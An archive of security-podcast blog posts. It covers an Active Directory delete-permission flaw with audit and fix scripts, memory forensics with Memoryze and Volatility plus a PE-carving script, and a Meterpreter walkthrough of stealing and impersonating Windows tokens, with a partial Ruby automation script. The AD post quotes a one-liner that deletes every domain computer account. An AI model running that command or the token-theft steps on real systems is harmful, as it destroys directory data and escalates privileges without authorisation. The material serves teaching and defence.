The PaulDotCom crew discuss the stories of the week...

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Doug Burks, who maintains the Security Onion project, turned me on to the CSAW exercises for the burgeoning army of ninjas. As I went through the challenges two things came to mind. First, I thought it might make a good blog post. Second, I started reminiscing about Dungeons and Dragons' Pool of Radiance.
Pool of Radiance was a Dungeons and Dragons simulation for my Commodore 64. The game was great, but in order to combat the software piracy that was so prevalent at the time, Strategic Simulations, the game's manufacturer, required that you enter a code off of a code wheel to play the game. If you didn't buy the game you supposedly wouldn't have a code wheel and you wouldn't be able to play. Well, I did have a code wheel, but having to dig it out every time I wanted to play was a pain. The result was my first foray into assembly language. I didn't know what I was doing, but I quickly learned that by changing JZ, JNE, JE and other "conditional jumps" to JMP (an unconditional jump) I could alter the way the game operated and remove the required code wheel. This was of course prior to the DMCA. :) But the excitement only started there. I soon learned I could alter the code that took away my character's hit points, guarantee a successful attack every time and otherwise cheat my way to victory. My love for assembly coding was born.
The CSAW challenges are fun and educational, and the skills you learn go beyond protecting Zelda's life points! Going through the exercises will help you with analyzing malware, understanding software bugs and developing exploits.
So check out the exercises HERE
I haven't had a chance to go through all of them, but here are some videos with an overview of the first few, using OllyDbg. Thanks to Matasano, NYU and everyone at CSAW for sharing them. If you like these challenges, there are similar training exercises on Bright Shadow and Crackmes.
Solution Exercises 1 & 2
Exercise 1 and 2 from PaulDotCom on Vimeo.
Solution Exercise 3
Exercise 3 from PaulDotCom on Vimeo.
Solution Exercises 4 & 5
Exercise 4 and 5 from PaulDotCom on Vimeo.
I will be teaching SANS 504 Incident Handling and Hacker Techniques in Raleigh-Durham, NC, June 21 through 26. Register here!
Before you can use this exploit you will need to install the Java Development Kit and the rjb Ruby gem. Carlos explains how to do that in the show notes.
*Note: In this video I misspoke and said that LPORT is not being used. In fact, it is used by the Meterpreter payload for its command-and-control communications channel.
Pauldotcom Episode 185 from PaulDotCom on Vimeo.
For detailed instructions check out Carlos' description in the show notes from last night. Join us every Thursday night at 7:30 at http://www.pauldotcom.com/live
I will be teaching SANS 504 Incident Handling and Hacker Techniques in Raleigh-Durham, NC, Monday, June 21, 2010 - Saturday, June 26, 2010. Sign up today.
Please join us for an interview with David Maman, CTO of GreenSQL, a company creating an open source database firewall used to protect databases from SQL injection attacks. Watch us live at 19:30 EST, Thursday January 28th for Episode 185 of PaulDotCom Security Weekly!

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Paul, Larry, Carlos, Darren, John & Mick
The PaulDotCom crew go one on one with an FBI agent, no handcuffs this time!

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Google/China/Aurora crapola, security stuff, fixing the real problems.

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Didier Stevens comes on the show to talk about PDF hacking!

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Please join us for an interview with computer forensics expert Eric M. Fiterman to discuss his background as an FBI Special Agent, his current work at Methodvue, and his upcoming Shmoocon presentation on forensics in the Cloud. Watch us live at 19:30 EST, Thursday January 21st for Episode 184 of PaulDotCom Security Weekly!

- Carlos, Larry, Mick, John, Darren, & Paul
Mick walks us through sneaky web crawling, GSM & DECT cracked, and more stories and tech news!

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
We'll chat with Belgian security blogger Didier Stevens about Google AdWords, PDF readers, Twitter-controlled Christmas trees and his unhealthy obsession with RFID tags. Watch us live at 19:30 EST, Thursday January 14th for Episode 183 of PaulDotCom Security Weekly.

- John, Darren, Mick, Carlos, Paul, & Larry
Bruce Potter comes on the show to talk about the death of defense in depth, full disclosure, netflow analysis, trusted computing, and Lard.

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Gone in 60 Seconds
The permissions assigned by many organizations through the Active Directory Delegation of Control wizard and/or their computer account creation process are more permissive than they should be. As a result, just about anyone can delete every computer account in an Active Directory domain.
In Active Directory, computers have accounts just like users. So as computers in your environment are deployed, or wiped and reloaded as a result of viruses, employee turnover, etc., technicians in the field need the "Add computer account to the domain" permission, or you need to give a few people permission to pre-stage the computer accounts. When you create a new computer object in AD (a staged account) you get to define who can join that computer to your domain.

(Image: the Add Computer Account dialog with its default permissions)
You can see that by default Windows wants you to give "Domain Admins" permission to join the computer to the domain. Indeed, limiting this permission to Domain Admins is a pretty good idea, as you will see in a minute. It would be great from a security standpoint, but in most environments Domain Admins are busy people and generally are not available to join every computer to the network. So organizations change this privilege to a larger group such as "Authenticated Users" or "Everyone" as new staged computer objects are created. Worse yet, in some large environments even staging computer accounts seems like a burden. Those organizations often delegate the ability to add computers to the domain to a larger user base using the Active Directory Delegation of Control wizard or through Group Policy. As a matter of fact, a Microsoft TechNet article walks administrators through giving all "Authenticated Users" the ability to add workstations to the domain. The end result is that in many organizations the ability to "Add Computer Accounts to the Domain" is extended to a pretty large group of people. Often, everyone can add computers to the domain.
So is that bad? I have spoken with a few systems administrators who asked, "Why not let everyone add their computer to the domain? You want everyone in your domain, right? If someone wants to volunteer for password complexity requirements, screen saver timeouts, etc., why not let them?" Hmmm.... That sounds tempting. Why NOT let everyone add computers to the domain? Is this a case where the principle of least privilege is wrong? No. In my opinion there are very good reasons to limit who can add computer objects to your domain, and this is just one of them.
Here is the problem: if you give Authenticated Users the ability to add a computer account, they get the following permissions on the computer object:
Allow DOMAIN\Authenticated Users SPECIAL ACCESS
    DELETE
    READ PERMISSIONS
    LIST CONTENTS
    READ PROPERTY
    DELETE TREE
    LIST OBJECT
    CONTROL ACCESS
As you can see, among the permissions assigned is the ability to DELETE the object. If these are the permissions on all the computer objects in your domain, then any authenticated user on your network can drop to a command prompt and delete ALL the computers in your domain with one simple command.
Any disgruntled authenticated user with a command prompt, or a piece of malware with a temper, can run "dsquery computer -limit 0 | dsrm" (dsrm reads the distinguished names from standard input, and asks for confirmation per object only until someone adds -noprompt) and you have a really, really bad day on your hands. In one fell swoop every computer account in the domain is deleted.
Could all your computer objects be deleted that easily? Chances are good that they could. To know for sure, go through your computer objects and see what permissions are assigned to them. Who has the ability to delete your computer objects? This command will show you the permissions on every computer object (typed at an interactive prompt; in a batch file, double the percent signs):
for /F "tokens=*" %i in ('dsquery computer -limit 0') do dsacls %i | more
Need to fix it? dsacls.exe lets you set the permissions on your computer objects as well. So drop to a command prompt and work out the dsacls syntax that sets the appropriate permissions for your environment. Here is a reference on dsacls.
First figure out what permissions to set by working on one computer object, doing something like this, which adds a Deny ACE for Delete (SD) and Delete Tree (DT):
dsacls "CN=COMPNAME,OU=SomeOU,DC=DOMAINNAME,DC=com" /D "Everyone:SDDT;;"
Once you have the permissions worked out for one object, run dsacls against all computer objects in the domain like this:
for /F "tokens=*" %i in ('dsquery computer -limit 0') do dsacls %i /D "Everyone:SDDT;;"
Be sure to address both "Authenticated Users" and "Everyone". One caveat: a Deny ACE wins over the Allow ACEs, and Everyone includes your administrators, so this also stops Domain Admins (and any decommissioning scripts) from deleting those computer objects until the ACL is changed again. If that is a problem, scope the Deny to the group that was over-granted, or strip the Delete bits from the offending Allow ACE instead. Keep in mind that you need to schedule these commands to run at a regular interval to cover the computer objects that are constantly being created. Of course, the best solution is to limit who can join a computer to your domain when the computer account is created.
Here is some sample output from dsacls. In the example below, "DOMAIN\badaccess" has exactly what you do NOT want "Everyone" or "Authenticated Users" to have. The rest of the permissions are the defaults and do not put your computer objects at risk.
dsacls "CN=TEST Computer Account,OU=OUNAME,DC=DOMAINNAME,DC=com"
Allow DOMAIN\Domain Admins FULL CONTROL
Allow BUILTIN\Account Operators FULL CONTROL
Allow NT AUTHORITY\SYSTEM FULL CONTROL
Allow DOMAIN\badaccess SPECIAL ACCESS
    DELETE
    READ PERMISSIONS
    LIST CONTENTS
    READ PROPERTY
    DELETE TREE
    LIST OBJECT
    CONTROL ACCESS
Allow NT AUTHORITY\Authenticated Users SPECIAL ACCESS
    READ PERMISSIONS
    LIST CONTENTS
    READ PROPERTY
    LIST OBJECT
Allow NT AUTHORITY\SELF SPECIAL ACCESS
    CREATE CHILD
    DELETE CHILD
Allow DOMAIN\admingroup FULL CONTROL
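As an added example (not from the original post), here is the same audit-and-fix procedure in PowerShell, which is where most Windows administrators would run it today. It assumes the RSAT ActiveDirectory module (Get-ADComputer and the AD: drive) and an account allowed to read, and for the fix write, the security descriptors of the computer objects. The function names, the $BroadPrincipals list and the example OU are mine. Unlike the dsacls command above, the fix does not add a Deny ACE; it removes only the Delete and Delete Tree bits from the over-broad Allow ACE, so the harmless read/list rights and the administrators' ability to delete stay intact. ACEs inherited from an OU are reported but not touched, because they have to be fixed on the parent.

```powershell
# Added example, not part of the original post. Needs the RSAT ActiveDirectory
# module (Get-ADComputer, the AD: drive) and an account allowed to read, and
# when fixing, write the security descriptors of the computer objects.
Import-Module ActiveDirectory

# Principals the post warns about, spelled as the AD: provider reports them.
$BroadPrincipals = @('Everyone', 'NT AUTHORITY\Authenticated Users', 'Authenticated Users')

# Rights that let a holder remove the object: SD and DT in dsacls terms, plus
# GenericAll (Full Control), which implies both.
$Delete     = [System.DirectoryServices.ActiveDirectoryRights]::Delete
$DeleteTree = [System.DirectoryServices.ActiveDirectoryRights]::DeleteTree
$GenericAll = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$DeleteMask = $Delete -bor $DeleteTree -bor $GenericAll

function Get-DeletableComputerObject {
    # Emits one record per Allow ACE that gives a broad principal delete rights.
    param([string]$SearchBase)
    $query = @{ Filter = '*' }
    if ($SearchBase) { $query['SearchBase'] = $SearchBase }

    foreach ($computer in Get-ADComputer @query) {
        $acl = Get-Acl -Path ("AD:\" + $computer.DistinguishedName)
        foreach ($ace in $acl.Access) {
            $who = $ace.IdentityReference.Value
            if ($ace.AccessControlType -eq 'Allow' -and
                $BroadPrincipals -contains $who -and
                ($ace.ActiveDirectoryRights -band $DeleteMask) -ne 0) {
                [pscustomobject]@{
                    Computer  = $computer.Name
                    DN        = $computer.DistinguishedName
                    Principal = $who
                    Rights    = $ace.ActiveDirectoryRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

function Remove-ComputerDeleteRight {
    # Strips only the Delete and DeleteTree bits from the offending Allow ACE,
    # leaving the read/list rights that the post says are harmless.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipeline)]$Finding)

    process {
        if ($Finding.Inherited) {
            Write-Warning "$($Finding.DN): ACE for $($Finding.Principal) is inherited; fix it on the parent OU."
            return
        }
        if (($Finding.Rights -band $GenericAll) -eq $GenericAll) {
            Write-Warning "$($Finding.DN): $($Finding.Principal) has Full Control; review that delegation by hand."
            return
        }
        $path = "AD:\" + $Finding.DN
        $acl  = Get-Acl -Path $path
        $sid  = ([System.Security.Principal.NTAccount]$Finding.Principal).Translate(
                    [System.Security.Principal.SecurityIdentifier])
        $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
                    $sid, ($Delete -bor $DeleteTree),
                    [System.Security.AccessControl.AccessControlType]::Allow)
        if ($PSCmdlet.ShouldProcess($Finding.DN, "remove Delete/DeleteTree for $($Finding.Principal)")) {
            [void]$acl.RemoveAccessRule($rule)
            Set-Acl -Path $path -AclObject $acl
        }
    }
}

# Usage: report first, dry-run the fix, then run it for real (OU is a placeholder).
#   Get-DeletableComputerObject -SearchBase 'OU=Workstations,DC=example,DC=com' | Format-Table
#   Get-DeletableComputerObject | Remove-ComputerDeleteRight -WhatIf
#   Get-DeletableComputerObject | Remove-ComputerDeleteRight
```

Run the audit again after the fix; any finding that survives is either inherited from an OU (fix the delegation there) or a Full Control grant that needs a human decision. As with the dsacls loop, newly staged computers will keep arriving with the old permissions until the join process itself is corrected, so schedule the audit.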
Join us to commemorate the death of Defense in Depth with Bruce Potter. Eulogy live tonight at 19:30 EST, Thursday January 7th for Episode 182 of PaulDotCom Security Weekly.

- Larry, Mick, Carlos, Paul, John, & Darren
What am I talking about? I am talking about RAM!
Here are some of the things we can recover from RAM: running processes, network connections, open files and encryption keys, including BitLocker keys.
The last one, recovering BitLocker keys from memory, comes from an awesome presentation by Jesse Kornblum on how to get the keys out of RAM. Check it out: http://jessekornblum.com/presentations/omfw08.pdf
There are some great tools for acquiring memory. You can use win32dd.exe, which writes a raw image file along with an MD5 hash of the output file.
My personal favorite, though, is Memoryze from Mandiant, available as a free download at http://www.mandiant.com. The cool thing about Memoryze is that you can run its enumeration scripts to get process information, the registry keys a process is using, which DLLs it has loaded, the drivers loaded in memory and so on, and you can do that either against an image it has acquired or against a live machine.
Here is how it works:
Open a command shell (cmd.exe) and change directories to where you installed Memoryze.
Type "MemoryDD.bat". It will create a directory called audits where it puts your memory image. Alternatively,
to write the image to a specific directory, type "MemoryDD.bat -output <directory_name>".
To identify all open ports with their processes and process IDs, type "Process.bat -ports true".
The output is in XML format:
In the output you can see the process forcefield.exe, process ID 900, making a connection out to IP address 68.142.101.68 on port 80. This is simply a great way to tell what process is doing what (e.g., malware making outbound connections).
Now suppose you wanted to look for rootkits in memory. You can use Mandiant's HookDetection.bat, which executes RootkitAudit.Batch.xml. It identifies hooks in kernel memory that are often used to subvert the integrity of the system, so you can see the different modules and how they relate to the kernel, drivers, etc.
In that output you can see the module that has hooks into the kernel, i.e. 1394BUS.sys, where it is located (\windows\system32\drivers\) and a description of it ("Driver").
If you had an unknown process with hooks into the kernel, this is where you would find it.
Now these are all great tools, but what do you do with a memory image after you have it? There are some basic techniques you can use for analysis. I would start with the strings command: run strings memory.img > memory.str. Then you can begin to parse the file for e-mail addresses, web sites visited (or connected to by malware), passwords, blogged text and unknown executables.
Once you have your image, you might choose to use a tool called Volatility. This tool simply ROCKS!
Here is how it works on Linux:
python volatility command -f /path_to_windows_memory_image
The keyword command refers to one of a series of commands you can choose from. Here is a list:
So what can we do with this? Let me show you. First, let's see what processes are running in memory.
First I type the command:
python volatility pslist -f /path_to_image/imagefile.img
and I will see output like this:
Now you can see the executables running. From the second column you can also see the PID (process ID). So let's say we did not know what jusched.exe (PID 2228) was, thought it might be malware and would like to send it to VirusTotal. Well then, let's grab it right out of memory:
python volatility procdump -p 2228 -f /path_to_image/imagefile.img
Now we have carved that process out. To be sure we did it correctly, let's take a look at the result in khexedit. Since this is supposed to be an .exe file, it should start with the bytes MZ in hex:
khexedit executable.2228.exe
We can see that it is in fact what we were looking for, so we could now send it up to VirusTotal, or dig deeper into the file to see what it does.
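The MZ check above is the first thing to do with anything carved out of memory, and it is easy to do programmatically for a whole image rather than one dump at a time. The following is an added example, not code from the post or from Volatility: it scans a raw image for candidate "MZ" headers, follows e_lfanew to the "PE\0\0" signature, reads the machine type, section count and SizeOfImage from the COFF and optional headers, and carves the bytes the header claims to occupy. The sample "memory image" is constructed inline (a decoy MZ plus one minimal PE32), so it runs offline. One caveat it makes explicit: a raw physical-memory dump does not hold a process contiguously, so this naive carve is for triage and hashing, while procdump rebuilds the image from the process's page tables.

```python
"""Added example (not from the original post): find PE headers in a raw memory
image and carve what each header claims to cover. The sample image is
constructed, not a real dump."""
import struct

DOS_HEADER_SIZE = 0x40          # IMAGE_DOS_HEADER
COFF_HEADER_SIZE = 0x18         # "PE\0\0" + IMAGE_FILE_HEADER
E_LFANEW_OFFSET = 0x3C          # pointer to the PE header, inside the DOS header
SIZEOFIMAGE_OFFSET = 0x38       # inside the optional header; same for PE32 and PE32+
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def parse_pe_at(image: bytes, pos: int):
    """Return header facts if `pos` starts a plausible PE image, else None."""
    if pos + DOS_HEADER_SIZE > len(image) or image[pos:pos + 2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", image, pos + E_LFANEW_OFFSET)[0]
    # Real binaries keep the PE header within the first page or so; anything
    # else is almost always a stray "MZ" inside unrelated data.
    if not DOS_HEADER_SIZE <= e_lfanew <= 0x400:
        return None
    pe = pos + e_lfanew
    if pe + COFF_HEADER_SIZE + SIZEOFIMAGE_OFFSET + 4 > len(image):
        return None
    if image[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", image, pe + 4)
    magic = struct.unpack_from("<H", image, pe + COFF_HEADER_SIZE)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC) or not 1 <= nsections <= 96:
        return None
    size_of_image = struct.unpack_from(
        "<I", image, pe + COFF_HEADER_SIZE + SIZEOFIMAGE_OFFSET)[0]
    return {"offset": pos, "machine": machine, "sections": nsections,
            "pe32plus": magic == PE32PLUS_MAGIC, "size_of_image": size_of_image}


def find_pe_headers(image: bytes) -> list:
    """Every offset in `image` that passes the MZ -> e_lfanew -> PE checks."""
    hits, pos = [], image.find(b"MZ")
    while pos != -1:
        hit = parse_pe_at(image, pos)
        if hit:
            hits.append(hit)
        pos = image.find(b"MZ", pos + 1)
    return hits


def carve_pe(image: bytes, offset: int) -> bytes:
    """Copy SizeOfImage bytes from a verified header.

    Caveat: assumes the image is contiguous at `offset`. In a physical-memory
    dump a process's pages are scattered, so use a page-table-aware tool such
    as Volatility's procdump for real work; this is fine for header triage."""
    hit = parse_pe_at(image, offset)
    if hit is None:
        raise ValueError("no PE header at offset 0x%x" % offset)
    return image[offset:offset + hit["size_of_image"]]


def build_fake_pe(num_sections=2, size_of_image=0x3000, pe32plus=False) -> bytes:
    """Constructed minimal PE image, used only as sample input."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, 0x80)          # PE header at +0x80
    stub = bytes(0x80 - DOS_HEADER_SIZE)
    opt_size = 0xF0 if pe32plus else 0xE0
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0",
                       0x8664 if pe32plus else 0x14C,            # AMD64 / i386
                       num_sections, 0, 0, 0, opt_size, 0x0002)  # EXECUTABLE_IMAGE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<I", opt, SIZEOFIMAGE_OFFSET, size_of_image)
    header = bytes(dos) + stub + coff + bytes(opt)
    return header + bytes(size_of_image - len(header))


# Constructed "memory image": zeros, a decoy "MZ" with a bogus e_lfanew at
# 0x1000, and a real-looking PE32 image at 0x2000.
DECOY = b"MZ" + bytes(0x200 - 2)
SAMPLE_IMAGE = (bytes(0x1000) + DECOY + bytes(0x2000 - 0x1000 - len(DECOY))
                + build_fake_pe() + bytes(0x500))

if __name__ == "__main__":
    for hit in find_pe_headers(SAMPLE_IMAGE):
        print("PE at 0x%(offset)x machine=0x%(machine)x sections=%(sections)d "
              "size=0x%(size_of_image)x" % hit)
```

Point it at a real dump with `find_pe_headers(open("memory.img", "rb").read())` and expect many hits, including the kernel, drivers and every DLL mapped into every process; the machine and section-count fields are a quick way to separate plausible modules from junk before you start hashing.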
Well, that is it for memory in this post. As always: be good, be safe, hack legally and responsibly, and share the knowledge. I'm out.
In revision 8055, HD committed new code that allows a Meterpreter session running as SYSTEM to manipulate tokens much more easily. Just as with incognito, one can now obtain an access token and impersonate an account through the Meterpreter Standard API; in fact I see the two as complementing each other. Let's impersonate the local Administrator account on a Windows 2003 system using incognito:
1: meterpreter > use incognito
2: Loading extension incognito...success.
3: meterpreter > list_tokens -u
4:
5: Delegation Tokens Available
6: ========================================
7: NT AUTHORITY\LOCAL SERVICE
8: NT AUTHORITY\NETWORK SERVICE
9: NT AUTHORITY\SYSTEM
10: WIN2K3LAB01\Administrator
11:
12: Impersonation Tokens Available
13: ========================================
14: NT AUTHORITY\ANONYMOUS LOGON
Lines 1 and 2 show the incognito extension being loaded; this injects a DLL into the process where Meterpreter is running so that it can service the new commands. On line 3 we list the tokens available to the attacker. SYSTEM is the best privilege level to hold when running this command, since it lets us see every token on the host; if we are not running as SYSTEM we will only see the tokens our own account has used to connect to other systems. Now we will change from our current user to the local Administrator using incognito:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token WIN2K3LAB01\\Administrator
[+] Delegation token available
[+] Successfully impersonated user WIN2K3LAB01\Administrator
meterpreter > getuid
Server username: WIN2K3LAB01\Administrator
Now we have moved from SYSTEM to the local Administrator. This is very useful when attacking a distributed system like Microsoft Active Directory, where local access alone is of limited benefit but being able to move to the credentials in use on that system, especially administrative credentials, is of great value.
The new commands in the Standard API are getprivs, steal_token and drop_token. They map to the following code in lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:
1: #
2: # Obtains as many privileges as possible on the target machine.
3: #
4: def cmd_getprivs(*args)
5:   print_line("=" * 60)
6:   print_line("Enabled Process Privileges")
7:   print_line("=" * 60)
8:   client.sys.config.getprivs.each do |priv|
9:     print_line(" #{priv}")
10:   end
11:   print_line("")
12: end
13:
14: #
15: # Tries to steal the primary token from the target process.
16: #
17:
18: def cmd_steal_token(*args)
19:   if(args.length != 1 or args[0] == "-h")
20:     print_error("Usage: steal_token [pid]")
21:     return
22:   end
23:   print_line("Stolen token with username: " + client.sys.config.steal_token(args[0]))
24: end
25:
26: #
27: # Drops any assumed token.
28: #
29:
30: def cmd_drop_token(*args)
31:   print_line("Relinquished token, now running as: " + client.sys.config.drop_token())
32: end
The drop_token command executes the function cmd_drop_token which, as can be seen on line 31, calls the API method client.sys.config.drop_token. The getprivs command executes cmd_getprivs, which in turn calls client.sys.config.getprivs; that returns an Array of the privileges now enabled in the process token. The steal_token command executes cmd_steal_token, which calls client.sys.config.steal_token with one required argument: the PID of the process from which to steal the token, if possible. As you can see, three simple API calls from inside a Meterpreter session are all it takes; this makes scripting these actions from other scripts extremely easy and sets this framework apart from others.
Let's impersonate a token that we know runs under the Administrator account, like the explorer.exe process of a logged-on user. We will list the processes, steal its token, check our privileges and then drop the token:
1: meterpreter > ps
2:
3: Process list
4: ============
5:
6: PID Name Path
7: --- ---- ----
8: 268 smss.exe \SystemRoot\System32\smss.exe
9: 320 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
10: 344 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
11: 392 services.exe C:\WINDOWS\system32\services.exe
12: 404 lsass.exe C:\WINDOWS\system32\lsass.exe
13: 600 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe
14: 620 svchost.exe C:\WINDOWS\system32\svchost.exe
15: 700 svchost.exe C:\WINDOWS\system32\svchost.exe
16: 756 svchost.exe C:\WINDOWS\system32\svchost.exe
17: 784 svchost.exe C:\WINDOWS\system32\svchost.exe
18: 820 svchost.exe C:\WINDOWS\System32\svchost.exe
19: 964 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
20: 992 msdtc.exe C:\WINDOWS\system32\msdtc.exe
21: 1104 dns.exe C:\WINDOWS\System32\dns.exe
22: 1152 svchost.exe C:\WINDOWS\System32\svchost.exe
23: 1216 svchost.exe C:\WINDOWS\system32\svchost.exe
24: 1296 vmtoolsd.exe C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
25: 1368 VMUpgradeHelper.exe C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
26: 1488 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe
27: 1560 svchost.exe C:\WINDOWS\System32\svchost.exe
28: 1704 dllhost.exe C:\WINDOWS\system32\dllhost.exe
29: 2164 Explorer.EXE C:\WINDOWS\Explorer.EXE
30: 2228 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
31: 2236 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
32: 2284 meter_224.exe C:\Documents and Settings\Administrator\Desktop\meter_224.exe
33: 2352 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
34: 2484 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe
35: 3076 svhost77.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svhost77.exe
36: 3096 taskmgr.exe C:\WINDOWS\system32\taskmgr.exe
37: meterpreter > steal_token 2164
38: Stolen token with username: WIN2K3LAB01\Administrator
39: meterpreter > getuid
40: Server username: WIN2K3LAB01\Administrator
41: meterpreter > drop_token
42: Relinquished token, now running as: NT AUTHORITY\SYSTEM
We first executed the ps command to list all processes with their PIDs. On line 37 we used the steal_token command to steal the token of the explorer process, PID 2164, and on line 39 we confirm with getuid that we are now running under that token. On line 41 we drop the token and return to running as SYSTEM. The drop_token command is also useful when we have impersonated a token using incognito and want to return to the original context.
The getprivs command lists all of the Windows process privileges that are enabled:
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
As you can see, Meterpreter keeps being expanded, making it the best payload available in Metasploit for use against Windows systems. This new token handling, combined with incognito and the ease with which it can be scripted, expands the flexibility of Meterpreter and what can be done with it.
Note:
During the writing of this blog post the ps command was improved; it now shows the user each process is running as, making the new set of commands even more useful:
meterpreter > ps

Process list
============

PID Name Path User
--- ---- ---- ----
268 smss.exe \SystemRoot\System32\smss.exe NT AUTHORITY\SYSTEM
300 svhost77.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svhost77.exe NT AUTHORITY\SYSTEM
320 csrss.exe \??\C:\WINDOWS\system32\csrss.exe NT AUTHORITY\SYSTEM
344 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe NT AUTHORITY\SYSTEM
392 services.exe C:\WINDOWS\system32\services.exe NT AUTHORITY\SYSTEM
404 lsass.exe C:\WINDOWS\system32\lsass.exe NT AUTHORITY\SYSTEM
600 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe NT AUTHORITY\SYSTEM
620 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\SYSTEM
700 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\NETWORK SERVICE
756 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\NETWORK SERVICE
784 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\LOCAL SERVICE
820 svchost.exe C:\WINDOWS\System32\svchost.exe NT AUTHORITY\SYSTEM
964 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe NT AUTHORITY\SYSTEM
992 msdtc.exe C:\WINDOWS\system32\msdtc.exe NT AUTHORITY\NETWORK SERVICE
1104 dns.exe C:\WINDOWS\System32\dns.exe NT AUTHORITY\SYSTEM
1152 svchost.exe C:\WINDOWS\System32\svchost.exe NT AUTHORITY\SYSTEM
1216 svchost.exe C:\WINDOWS\system32\svchost.exe NT AUTHORITY\LOCAL SERVICE
1296 vmtoolsd.exe C:\Program Files\VMware\VMware Tools\vmtoolsd.exe NT AUTHORITY\SYSTEM
1368 VMUpgradeHelper.exe C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe NT AUTHORITY\SYSTEM
1560 svchost.exe C:\WINDOWS\System32\svchost.exe NT AUTHORITY\SYSTEM
1704 dllhost.exe C:\WINDOWS\system32\dllhost.exe NT AUTHORITY\SYSTEM
2164 Explorer.EXE C:\WINDOWS\Explorer.EXE WIN2K3LAB01\Administrator
2228 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe WIN2K3LAB01\Administrator
2236 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe WIN2K3LAB01\Administrator
2352 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe WIN2K3LAB01\Administrator
2484 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe NT AUTHORITY\SYSTEM
3096 taskmgr.exe C:\WINDOWS\system32\taskmgr.exe WIN2K3LAB01\Administrator

meterpreter >
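The post's point is that steal_token, getuid and drop_token are plain API calls, so the manual ps / steal_token / getuid / drop_token sequence above, together with the per-process User column the note adds, is exactly what a script would loop over. The following is an added example, not code from the post or from the Metasploit project. It assumes `client` is a live Meterpreter session, that client.sys.process.get_processes returns Hashes with 'pid', 'name' and 'user' keys (as the ps output suggests), and it uses only the stdapi calls named in the post. The helper names, the skip list and the sample process list (modelled on the ps output, with a constructed user for the payload process) are mine; the pure helpers run offline, and only try_each_token needs a session.

```ruby
# Added example, not code from the original post or from the Metasploit
# project. Scripts the stdapi calls the post describes (steal_token, getuid,
# drop_token) around client.sys.process.get_processes, whose entries are
# assumed to be Hashes keyed 'pid', 'name' and 'user'. `client` is a live
# Meterpreter session and is only touched inside try_each_token.

# Processes whose primary token is worth stealing: anything running as an
# account other than the one we hold, minus our own payload process. As in
# the post, explorer.exe goes first because it carries the interactive
# user's token.
def token_candidates(processes, current_user, skip_names: [])
  skip = skip_names.map(&:downcase)
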